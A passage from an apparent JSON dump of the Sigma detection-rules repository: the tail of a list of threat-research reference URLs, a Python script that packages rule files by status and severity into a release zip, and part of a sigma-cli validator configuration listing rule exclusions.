ell-scripts.html\nhttps://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore\nhttps://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks\nhttps://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore\nhttps://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-report-avaddon-and-new-techniques-emerge-industrial-sector-targeted\nhttps://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte\nhttps://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/trojan.win32.azoruit.a\nhttps://www.trendmicro.com/vinfo/vn/threat-encyclopedia/malware/ransom.bat.zarlock.a\nhttps://www.trimarcsecurity.com/single-post/TrimarcResearch/Detecting-Kerberoasting-Activity\nhttps://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/\nhttps://www.trustedsec.com/blog/art_of_kerberoast/\nhttps://www.trustedsec.com/blog/critical-outlook-vulnerability-in-depth-technical-analysis-and-recommendations-cve-2023-23397/\nhttps://www.trustedsec.com/blog/critical-vulnerability-in-progress-moveit-transfer-technical-analysis-and-recommendations/\nhttps://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/\nhttps://www.trustedsec.com/blog/making-smb-accessible-with-ntlmquic/\nhttps://www.trustedsec.com/blog/new-attacks-old-tricks-how-onenote-malware-is-evolving/\nhttps://www.trustedsec.com/july-2015/malicious-htas/\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/honeypot-recon-mysql-malware-infection-via-user-defined-functions-udf/\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tutorial-for-ntds-goodness-vssadmin-wmis-ntdsdit-system/\nhttps://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell\nhttps://www.tutorialspoint.com/how-to-install-a-software-on-linux-using-yum-command\nhttps://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728\nhttps://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729\nhttps://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730\nhttps://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4800\nhttps://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4825\nhttps://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632\nhttps://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633\nhttps://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634\nhttps://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015\nhttps://www.ultimatewindowssecurity.com/wiki/page.aspx?spid=NSrpcservers\nhttps://www.uptycs.com/blog/kuraystealer-a-bandit-using-discord-webhooks\nhttps://www.uptycs.com/blog/lolbins-are-no-laughing-matter\nhttps://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing\nhttps://www.us-cert.gov/ncas/alerts/TA17-117A\nhttps://www.us-cert.gov/ncas/alerts/TA17-293A\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-312A\nhttps://www.varonis.com/blog/investigate-ntlm-brute-force\nhttps://www.vectra.ai/blog/undermining-microsoft-teams-security-by-mining-tokens\nhttps://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens\nhttps://www.verfassungsschutz.de/SharedDocs/publikationen/DE/cyberabwehr/2024-02-19-joint-cyber-security-advisory-englisch.pdf?__blob=publicationFile&v=2\nhttps://www.virusradar.com/en/Win32_Kasidet.AD/description\nhttps://www.virustotal.com/#/file/276a765a10f98cda1a38d3a31e7483585ca3722ecad19d784441293acf1b7beb/detection\nhttps://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/\nhttps://www.virustotal.com/en/file/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022/analysis/\nhttps://www.virustotal.com/gui/domain/paste.ee/relations\nhttps://www.virustotal.com/gui/file/02e8e8c5d430d8b768980f517b62d7792d690982b9ba0f7e04163cbc1a6e7915\nhttps://www.virustotal.com/gui/file/0373d78db6c3c0f6f6dcc409821bf89e1ad8c165d6f95c5c80ecdce2219627d7/behavior\nhttps://www.virustotal.com/gui/file/03b71eaceadea05bc0eea5cddecaa05f245126d6b16cfcd0f3ba0442ac58dab3/behavior\nhttps://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection\nhttps://www.virustotal.com/gui/file/05a2adb266ec6c0ba9ed176d87d8530e71e845348c13caf9f60049760c312cd3/behavior\nhttps://www.virustotal.com/gui/file/0e2854753d17b1bb534de8e765d5813c9fb584a745978b3d92bc6ca78e3e7735/relations\nhttps://www.virustotal.com/gui/file/13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31\nhttps://www.virustotal.com/gui/file/13ae8bfbc02254b389ab052aba5e1ba169b16a399d9bc4cb7414c4a73cd7dc78/detection\nhttps://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed\nhttps://www.virustotal.com/gui/file/16bafdf741e7a13137c489f3c8db1334f171c7cb13b62617d691b0a64783cc48/behavior\nhttps://www.virustotal.com/gui/file/1c547a064494a35d6b5e6b459de183ab2720a22725e082bed6f6629211f7abc1/behavior\nhttps://www.virustotal.com/gui/file/20179093c59bca3acc6ce9a4281e8462f577ffd29fd7bf51cf2a70d106062045\nhttps://www.virustotal.com/gui/file/23160972c6ae07f740800fa28e421a81d7c0ca5d5cab95bc082b4a986fbac57\nhttps://www.virustotal.com/gui/file/288fc4f954f98d724e6fab32a89477943df5c0e9662cb199a19b90ae0c63aebe/detection\nhttps://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465\nhttps://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection\nhttps://www.virustotal.com/gui/file/339ff720c74dc44265b917b6d3e3ba0411d61f3cd3c328e9a2bae81592c8a6e5/content\nhttps://www.virustotal.com/gui/file/34de4c8beded481a4084a1fd77855c3e977e8ac643e5c5842d0f15f7f9b9086f/behavior\nhttps://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior\nhttps://www.virustotal.com/gui/file/364275326bbfc4a3b89233dabdaf3230a3d149ab774678342a40644ad9f8d614/details\nhttps://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955\nhttps://www.virustotal.com/gui/file/39102fb7bb6a74a9c8cb6d46419f9015b381199ea8524c1376672b30fffd69d2\nhttps://www.virustotal.com/gui/file/3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac\nhttps://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection\nhttps://www.virustotal.com/gui/file/427616528b7dbc4a6057ac89eb174a3a90f7abcf3f34e5a359b7a910d82f7a72/behavior\nhttps://www.virustotal.com/gui/file/43b0f7872900bd234975a0877744554f4f355dc57505517abd1ef611e1ce6916\nhttps://www.virustotal.com/gui/file/483fafc64a2b84197e1ef6a3f51e443f84dc5742602e08b9e8ec6ad690b34ed0/behavior\nhttps://www.virustotal.com/gui/file/4abe1395a09fda06d897a9c4eb247278c1b6cddda5d126ce5b3f4f499e3b8fa2/behavior\nhttps://www.virustotal.com/gui/file/4ffdc72d1ff1ee8228e31691020fc275afd1baee5a985403a71ca8c7bd36e2e4/behavior\nhttps://www.virustotal.com/gui/file/5092b2672b4cb87a8dd1c2e6047b487b95995ad8ed5e9fc217f46b8bfb1b8c01\nhttps://www.virustotal.com/gui/file/554db97ea82f17eba516e6a6fdb9dc04b1d25580a1eb8cb755eeb260ad0bd61d\nhttps://www.virustotal.com/gui/file/56db0c4842a63234ab7fe2dda6eeb63aa7bb68f9a456985b519122f74dea37e2/behavior\nhttps://www.virustotal.com/gui/file/58d21840d915aaf4040ceb89522396124c82f325282f805d1085527e1e2ccfa1/detection\nhttps://www.virustotal.com/gui/file/5907d59ec1303cfb5c0a0f4aaca3efc0830707d86c732ba6b9e842b5730b95dc/behavior\nhttps://www.virustotal.com/gui/file/5e75ef02517afd6e8ba6462b19217dc4a5a574abb33d10eb0f2bab49d8d48c22/behavior\nhttps://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619\nhttps://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior\nhttps://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection\nhttps://www.virustotal.com/gui/file/69fe77dd558e281621418980040e2af89a2547d377d0f2875502005ce22bc95c\nhttps://www.virustotal.com/gui/file/6d3ab9e729bb03ae8ae3fcd824474c5052a165de6cb4c27334969a542c7b261d/detection\nhttps://www.virustotal.com/gui/file/6f0f20da34396166df352bf301b3c59ef42b0bc67f52af3d541b0161c47ede05\nhttps://www.virustotal.com/gui/file/720a7ee9f2178c70501d7e3f4bcc28a4f456e200486dbd401b25af6da3b4da62/content\nhttps://www.virustotal.com/gui/file/72f1a5476a845ea02344c9b7edecfe399f64b52409229edaf856fcb9535e3242\nhttps://www.virustotal.com/gui/file/7872d8845a332dce517adae9c3389fde5313ff2fed38c2577f3b498da786db68/behavior\nhttps://www.virustotal.com/gui/file/7cdee5a583eacf24b1f142413aabb4e556ccf4ef3a4764ad084c1526cc90e117/community\nhttps://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection\nhttps://www.virustotal.com/gui/file/8f8daabe1c8ceb5710949283818e16c4aa8059bf2ce345e2f2c90b8692978424\nhttps://www.virustotal.com/gui/file/91ba814a86ddedc7a9d546e26f912c541205b47a853d227756ab1334ade92c3f\nhttps://www.virustotal.com/gui/file/91e405e8a527023fb8696624e70498ae83660fe6757cef4871ce9bcc659264d3/details\nhttps://www.virustotal.com/gui/file/925b0b28472d4d79b4bf92050e38cc2b8f722691c713fc28743ac38551bc3797\nhttps://www.virustotal.com/gui/file/94816439312563db982cd038cf77cbc5ef4c7003e3edee86e2b0f99e675ed4ed/behavior\nhttps://www.virustotal.com/gui/file/a4edfbd42595d5bddb442c82a02cf0aaa10893c1bf79ea08b9ce576f82749448\nhttps://www.virustotal.com/gui/file/a63376ee1dba76361df73338928e528ca5b20171ea74c24581605366dcaa0104/behavior\nhttps://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection\nhttps://www.virustotal.com/gui/file/a864282fea5a536510ae86c77ce46f7827687783628e4f2ceb5bf2c41b8cd3c6/behavior\nhttps://www.virustotal.com/gui/file/af1c82237b6e5a3a7cdbad82cc498d298c67845d92971bada450023d1335e267/content\nhttps://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection\nhttps://www.virustotal.com/gui/file/b4b1fc65f87b3dcfa35e2dbe8e0a34ad9d8a400bec332025c0a2e200671038aa/behavior\nhttps://www.virustotal.com/gui/file/b6e8910fb9b3bb1fcddefd35ff0ed8624930d30d6977e11808c8330415685a62\nhttps://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection\nhttps://www.virustotal.com/gui/file/ba88ca45589fae0139a40ca27738a8fc2dfbe1be5a64a9558f4e0f52b35c5add\nhttps://www.virustotal.com/gui/file/bd07fb1e9b4768e7202de6cc454c78c6891270af02085c51fce5539db1386c3f/behavior\nhttps://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection\nhttps://www.virustotal.com/gui/file/beddf70a7bab805f0c0b69ac0989db6755949f9f68525c08cb874988353f78a9/content\nhttps://www.virustotal.com/gui/file/c1f27d9795a2eba630db8a043580a0761798f06370fb1317067805f8a845b00c\nhttps://www.virustotal.com/gui/file/c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d/detection\nhttps://www.virustotal.com/gui/file/c312c05ddbd227cbb08958876df2b69d0f7c1b09e5689eb9d93c5b357f63eff7\nhttps://www.virustotal.com/gui/file/c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761\nhttps://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/\nhttps://www.virustotal.com/gui/file/d3fa64f63563fe958b75238742d1e473800cb5f49f5cb79d38d4aa3c93709026/behavior\nhttps://www.virustotal.com/gui/file/d4486b63512755316625230e0c9c81655093be93876e0d80732e7eeaf7d83476/content\nhttps://www.virustotal.com/gui/file/d5661009c461a8b20e1ad22f48609cc84dd90aee9182e026659dde4d46aaf25e/relations\nhttps://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE\nhttps://www.virustotal.com/gui/file/d6f6bc10ae0e634ed4301d584f61418cee18e5d58ad9af72f8aa552dc4aaeca3/behavior\nhttps://www.virustotal.com/gui/file/d72af640b71b8e3eca3eba660dd7c7f029ff8852bcacaa379e7b6c57cf4d9b44\nhttps://www.virustotal.com/gui/file/d9669f7e3eb3a9cdf6a750eeb2ba303b5ae148a43e36546896f1d1801e912466\nhttps://www.virustotal.com/gui/file/ded20df574b843aaa3c8e977c2040e1498ae17c12924a19868df5b12dee6dfdd\nhttps://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection\nhttps://www.virustotal.com/gui/file/fa71eee906a7849ba3f4bab74edb577bd1f1f8397ca428591b4a9872ce1f1e9b/behavior\nhttps://www.virustotal.com/gui/file/fab408536aa37c4abc8be97ab9c1f86cb33b63923d423fdc2859eb9d63fa8ea0/community\nhttps://www.virustotal.com/gui/file/fc614fb4bda24ae8ca2c44e812d12c0fab6dd7a097472a35dd12ded053ab8474\nhttps://www.virustotal.com/gui/file/fdc86a5b3d7df37a72c3272836f743747c47bfbc538f05af9ecf78547fa2e789/behavior\nhttps://www.virustotal.com/gui/search/behaviour_network%253A*.miningocean.org/files\nhttps://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files\nhttps://www.virustotal.com/gui/search/filename%253A*spoof*%2520filename%253A*ppid*/files\nhttps://www.virustotal.com/gui/search/metadata%253ACube0x0/files\nhttps://www.vmray.com/analyses/2d2fa29185ad/report/overview.html\nhttps://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/\nhttps://www.vmware.com/security/advisories/VMSA-2021-0002.html\nhttps://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/\nhttps://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/\nhttps://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/\nhttps://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/\nhttps://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/\nhttps://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html\nhttps://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/\nhttps://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/\nhttps://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/\nhttps://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/\nhttps://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/\nhttps://www.welivesecurity.com/2019/05/29/turla-powershell-usage/\nhttps://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/\nhttps://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/\nhttps://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/\nhttps://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/\nhttps://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/\nhttps://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/\nhttps://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/\nhttps://www.welivesecurity.com/en/eset-research/lazarus-luring-employees-trojanized-coding-challenges-case-spanish-aerospace-company/\nhttps://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf\nhttps://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf\nhttps://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/\nhttps://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\nhttps://www.wietzebeukema.nl/blog/windows-command-line-obfuscation\nhttps://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/\nhttps://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/\nhttps://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs\nhttps://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure\nhttps://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/\nhttps://www.x86matthew.com/view_post?id=create_svc_rpc\nhttps://www.x86matthew.com/view_post?id=embed_exe_lnk\nhttps://www.yang99.top/index.php/archives/82/\nhttps://www.yeahhub.com/list-installed-programs-version-path-windows/\nhttps://www.youtube.com/watch?v=3gz1QmiMhss&t=1251s\nhttps://www.youtube.com/watch?v=52tAmVLg1KM&t=2070s\nhttps://www.youtube.com/watch?v=DLtJTxMWZ2o\nhttps://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s\nhttps://www.youtube.com/watch?v=ebmW42YYveI\nhttps://www.youtube.com/watch?v=ggY3srD9dYs&ab_channel=GrzegorzTworek\nhttps://www.youtube.com/watch?v=Ie831jF0bb0\nhttps://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW\nhttps://www.youtube.com/watch?v=ro2QuZTIMBM\nhttps://www.youtube.com/watch?v=VmvY5SQm5-Y&ab_channel=M45C07\nhttps://www.zerodayinitiative.com/advisories/ZDI-21-1308/\nhttps://www.zerodayinitiative.com/advisories/ZDI-23-491/\nhttps://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege\nhttps://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server\nhttps://www.zerodayinitiative.com/blog/2023/4/21/tp-link-wan-side-vulnerability-cve-2023-1389-added-to-the-mirai-botnet-arsenal\nhttps://www.zoocoup.org/casper/jamf_cheatsheet.pdf\nhttps://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users\nhttps://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east\nhttps://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution\nhttps://www.zscaler.com/blogs/security-research/steal-it-campaign\nhttps://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware\nhttps://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37\nhttps://x.com/_st0pp3r_/status/1742203752361128162?s=20\nhttps://x.com/cyb3rops/status/1862406110365245506\nhttps://x.com/defusedcyber/status/1971492272966598683\nhttps://x.com/nas_bench/status/1868639048484425963\nhttps://x.com/NullSecurityX/status/1937444064867029179\nhttps://x.com/russianpanda9xx/status/1940831134759506029\nhttps://x.com/yarden_shafir/status/1822667605175324787\nhttps://xmrig.com/docs/miner/command-line-options\nhttps://xz.aliyun.com/t/12175\nhttps://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/\nhttps://yoroi.company/wp-content/uploads/2022/05/EternityGroup_report_compressed.pdf\nhttps://youtu.be/5mqid-7zp8k?t=2231\nhttps://youtu.be/5mqid-7zp8k?t=2481\nhttps://youtu.be/7aemGhaE9ds?t=641\nhttps://youtu.be/n2dFlSaBBKo\nhttps://youtu.be/zSihR3lTf7g\nhttps://zero2auto.com/2020/05/19/netwalker-re/\nhttps://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/\nhttps://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/\n"
  },
  {
    "path": "tests/sigma-package-release.py",
    "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreates the Sigma release archive packages for different configurations\n\nEXAMPLE\n# python3 sigma-package-release.py --min-status test --levels high critical --rule-types generic --outfile Sigma-standard.zip\n\"\"\"\n\nimport os\nimport sys\nimport argparse\nimport yaml\nimport zipfile\nimport datetime\nimport subprocess\n\nSTATUS = [\"experimental\", \"test\", \"stable\"]\nLEVEL = [\"informational\", \"low\", \"medium\", \"high\", \"critical\"]\nRULES_DICT = {\n    \"generic\": \"rules\",\n    \"rules\": \"rules\",\n    \"core\": \"rules\",\n    \"emerging-threats\": \"rules-emerging-threats\",\n    \"rules-emerging-threats\": \"rules-emerging-threats\",\n    \"et\": \"rules-emerging-threats\",\n    \"threat-hunting\": \"rules-threat-hunting\",\n    \"th\": \"rules-threat-hunting\",\n    \"rules-threat-hunting\": \"rules-threat-hunting\",\n}\nRULES = [x for x in RULES_DICT.keys()]\n\n\ndef init_arguments(arguments: list) -> list:\n    parser = argparse.ArgumentParser(\n        description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter\n    )\n    parser.add_argument(\n        \"-o\",\n        \"--outfile\",\n        help=\"Outputs the Sigma release package as ZIP archive\",\n        default=\"Sigma-standard.zip\",\n        required=True,\n    )\n    arg_status = parser.add_mutually_exclusive_group(required=True)\n    arg_status.add_argument(\n        \"-s\", \"--statuses\", nargs=\"*\", choices=STATUS, help=\"Select status of rules\"\n    )\n    arg_status.add_argument(\n        \"-ms\",\n        \"--min-status\",\n        nargs=\"?\",\n        choices=STATUS,\n        help=\"Sets the minimum status of rules to select\",\n    )\n    arg_level = parser.add_mutually_exclusive_group(required=True)\n    arg_level.add_argument(\n        \"-l\", \"--levels\", nargs=\"*\", choices=LEVEL, help=\"Select level of rules\"\n    )\n    arg_level.add_argument(\n        \"-ml\",\n        \"--min-level\",\n        nargs=\"?\",\n        choices=LEVEL,\n        help=\"Sets the minimum level of rules to select\",\n    )\n    parser.add_argument(\n        \"-r\", \"--rule-types\", choices=RULES, nargs=\"*\", help=\"Select type of rules\"\n    )\n    args = parser.parse_args(arguments)\n\n    if not args.outfile.endswith(\".zip\"):\n        args.outfile = args.outfile + \".zip\"\n\n    if os.path.exists(args.outfile):\n        print(\n            \"[E] '{}' already exists. Choose a different output file name.\".format(\n                args.outfile\n            )\n        )\n        sys.exit(1)\n\n    if args.rule_types == None:\n        args.rule_types = [\"generic\"]\n        print('[I] -r/--rule-types not defined: Using \"generic\" by default')\n\n    if args.min_level != None:\n        i = LEVEL.index(args.min_level)\n        args.levels = LEVEL[i:]\n\n    if args.min_status != None:\n        i = STATUS.index(args.min_status)\n        args.statuses = STATUS[i:]\n\n    return args\n\n\ndef select_rules(args: dict) -> list:\n    selected_rules = []\n\n    def yield_next_rule_file_path(rule_path: str) -> str:\n        for root, _, files in os.walk(rule_path):\n            for file in files:\n                if file.endswith(\".yml\"):\n                    yield os.path.join(root, file)\n\n    def get_rule_yaml(file_path: str) -> dict:\n        data = []\n\n        with open(file_path, encoding=\"utf-8\") as f:\n            yaml_parts = yaml.safe_load_all(f)\n            for part in yaml_parts:\n                data.append(part)\n        return data\n\n    for rules_path_alias in args.rule_types:\n        rules_path = RULES_DICT[rules_path_alias]\n        for file in yield_next_rule_file_path(rule_path=rules_path):\n            rule_yaml = get_rule_yaml(file_path=file)\n            if len(rule_yaml) != 1:\n                print(\n                    \"[E] rule {} is a multi-document file and will be skipped\".format(\n                        file\n                    )\n                )\n                continue\n\n            rule = rule_yaml[0]\n            if rule[\"level\"] in args.levels and rule[\"status\"] in args.statuses:\n                selected_rules.append(file)\n\n    return selected_rules\n\n\ndef write_zip(outfile: str, selected_rules: list):\n    with zipfile.ZipFile(\n        outfile, mode=\"a\", compression=zipfile.ZIP_DEFLATED, compresslevel=9\n    ) as zip:\n        for rule_path in selected_rules:\n            zip.write(rule_path)\n\n        # Write version info text file\n        today = datetime.date.today().isoformat()\n        label = subprocess.check_output([\"git\", \"describe\", \"--always\"]).strip()\n        commit_hash = subprocess.check_output([\"git\", \"rev-parse\", \"HEAD\"]).strip()\n        version = \"Release Date: {}\\nLabel: {}\\nCommit-Hash: {}\\n\".format(\n            today, label.decode(), commit_hash.decode()\n        )\n        zip.writestr(\"version.txt\", version)\n    return\n\n\ndef main(arguments: list) -> int:\n    args = init_arguments(arguments)\n\n    print(\"[I] Parsing and selecting rules, this will take some time...\")\n    selected_rules = select_rules(args)\n    print(\"[I] Selected {} rules\".format(len(selected_rules)))\n\n    write_zip(args.outfile, selected_rules)\n    print(\"[I] Written all rules to output ZIP file '{}'\".format(args.outfile))\n\n\nif __name__ == \"__main__\":\n    sys.exit(main(sys.argv[1:]))\n"
  },
  {
    "path": "tests/sigma_cli_conf.yml",
    "content": "validators:\n    - all\n    - -tlptag\n    - -tlpv1_tag\n    - -sigmahq_fieldname_cast\n    - -sigmahq_filename_prefix\n    - -sigmahq_logsource_unknown\n    - -sigmahq_ofselection_condition\n    - -sigmahq_sysmon_missing_eventid\nexclusions:\n    # escaped_wildcard\n    021310d9-30a6-480a-84b7-eaa69aeb92bb: escaped_wildcard\n    1114e048-b69c-4f41-bc20-657245ae6e3f: escaped_wildcard\n    204b17ae-4007-471b-917b-b917b315c5db: escaped_wildcard\n    214e8f95-100a-4e04-bb31-ef6cba8ce07e: escaped_wildcard\n    220457c1-1c9f-4c2e-afe6-9598926222c1: escaped_wildcard\n    252902e3-5830-4cf6-bf21-c22083dfd5cf: escaped_wildcard\n    2d3cdeec-c0db-45b4-aa86-082f7eb75701: escaped_wildcard\n    2e7bbd54-2f26-476e-b4a1-ba5f1a012614: escaped_wildcard\n    304810ed-8853-437f-9e36-c4975c3dfd7e: escaped_wildcard\n    31d68132-4038-47c7-8f8e-635a39a7c174: escaped_wildcard\n    32d56ea1-417f-44ff-822b-882873f5f43b: escaped_wildcard\n    4281cb20-2994-4580-aa63-c8b86d019934: escaped_wildcard\n    434c08ba-8406-4d15-8b24-782cb071a691: escaped_wildcard\n    435e10e4-992a-4281-96f3-38b11106adde: escaped_wildcard\n    52d8b0c6-53d6-439a-9e41-52ad442ad9ad: escaped_wildcard\n    586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3: escaped_wildcard\n    59e938ff-0d6d-4dc3-b13f-36cc28734d4e: escaped_wildcard\n    7857f021-007f-4928-8b2c-7aedbe64bb82: escaped_wildcard\n    7aaa5739-12fc-41aa-b98b-23ec27d42bdf: escaped_wildcard\n    7c9340a9-e2ee-4e43-94c5-c54ebbea1006: escaped_wildcard\n    7dc2dedd-7603-461a-bc13-15803d132355: escaped_wildcard\n    8fe1c584-ee61-444b-be21-e9054b229694: escaped_wildcard\n    904e8e61-8edf-4350-b59c-b905fc8e810c: escaped_wildcard\n    95724fc1-a258-4674-97db-a30351981c5a: escaped_wildcard\n    9637e8a5-7131-4f7f-bdc7-2b05d8670c43: escaped_wildcard\n    a36ce77e-30db-4ea0-8795-644d7af5dfb4: escaped_wildcard\n    a4824fca-976f-4964-b334-0621379e84c4: escaped_wildcard\n    a8f29a7b-b137-4446-80a0-b804272f3da2: escaped_wildcard\n    afe52666-401e-4a02-b4ff-5d128990b8cb: escaped_wildcard\n    c2993223-6da8-4b1a-88ee-668b8bf315e9: escaped_wildcard\n    c37510b8-2107-4b78-aa32-72f251e7a844: escaped_wildcard\n    c462f537-a1e3-41a6-b5fc-b2c2cef9bf82: escaped_wildcard\n    c73124a7-3e89-44a3-bdc1-25fe4df754b1: escaped_wildcard\n    d84c0ded-edd7-4123-80ed-348bb3ccc4d5: escaped_wildcard\n    db885529-903f-4c5d-9864-28fe199e6370: escaped_wildcard\n    dd218fb6-4d02-42dc-85f0-a0a376072efd: escaped_wildcard\n    dde85b37-40cd-4a94-b00c-0b8794f956b5: escaped_wildcard\n    e06ac91d-b9e6-443d-8e5b-af749e7aa6b6: escaped_wildcard\n    f3f21ce1-cdef-4bfc-8328-ed2e826f5fac: escaped_wildcard\n    f57f8d16-1f39-4dcb-a604-6c73d9b54b3d: escaped_wildcard\n    